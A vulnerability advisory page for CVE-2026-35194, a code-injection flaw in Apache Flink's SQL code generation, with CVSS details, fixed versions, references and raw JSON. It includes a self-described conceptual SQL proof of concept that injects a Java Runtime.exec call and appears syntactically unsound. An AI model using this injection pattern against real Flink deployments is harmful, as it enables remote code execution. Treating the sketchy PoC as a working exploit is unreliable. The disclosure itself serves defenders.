Security Vulnerability Report
CVE-2026-35194 CVSS 8.1 HIGH

CVE-2026-35194

Published: 2026-05-15 16:16:14
Last Modified: 2026-05-15 22:16:52

Description

Code injection in SQL code generation in Apache Flink 1.15.0 through 1.20.x and 2.0.0 through 2.x allows authenticated users with query submission privileges to execute arbitrary code on TaskManagers via maliciously crafted SQL queries. The vulnerability affects JSON functions (1.15.0+) and LIKE expressions with ESCAPE clauses (1.17.0+). User-controlled strings are interpolated into generated Java code without proper escaping, allowing attackers to break out of string literals and inject arbitrary expressions. Users are recommended to upgrade to either version 1.20.4, 2.0.2, 2.1.2 or 2.2.1, which fixes this issue.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Apache Flink 1.15.0 - 1.20.x
Apache Flink 2.0.0 - 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```sql
-- Conceptual PoC for CVE-2026-35194
-- Targeting JSON_VALUE code generation in Apache Flink
-- The vulnerability allows breaking out of string literals in the generated Java code.
-- An attacker can inject arbitrary Java expressions.
-- Example malicious SQL query:
SELECT JSON_VALUE(data, '$.key') FROM source_table WHERE data = '{"key": "' + '}; /* Malicious Java Code Injection */ java.lang.Runtime.getRuntime().exec("calc"); // ' + ""}';
-- Note: The actual payload syntax depends on the specific code generation template
-- used by the affected Flink version for JSON functions or LIKE...ESCAPE clauses.
```

References

https://lists.apache.org/thread/qh52bw4hhvy7n2owd8b3bt51mz0lvj9x
http://www.openwall.com/lists/oss-security/2026/05/15/20
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35194",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T16:16:14.340",
    "lastModified": "2026-05-15T22:16:51.900",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Code injection in SQL code generation in Apache Flink 1.15.0 through 1.20.x and 2.0.0 through 2.x allows authenticated users with query submission privileges to execute arbitrary code on TaskManagers via maliciously crafted SQL queries. The vulnerability affects JSON functions (1.15.0+) and LIKE expressions with ESCAPE clauses (1.17.0+). User-controlled strings are interpolated into generated Java code without proper escaping, allowing attackers to break out of string literals and inject arbitrary expressions.\n\nUsers are recommended to upgrade to either version 1.20.4, 2.0.2, 2.1.2 or 2.2.1, which fixes this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-94"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/qh52bw4hhvy7n2owd8b3bt51mz0lvj9x",
        "source": "[email protected]"
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/15/20",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}
```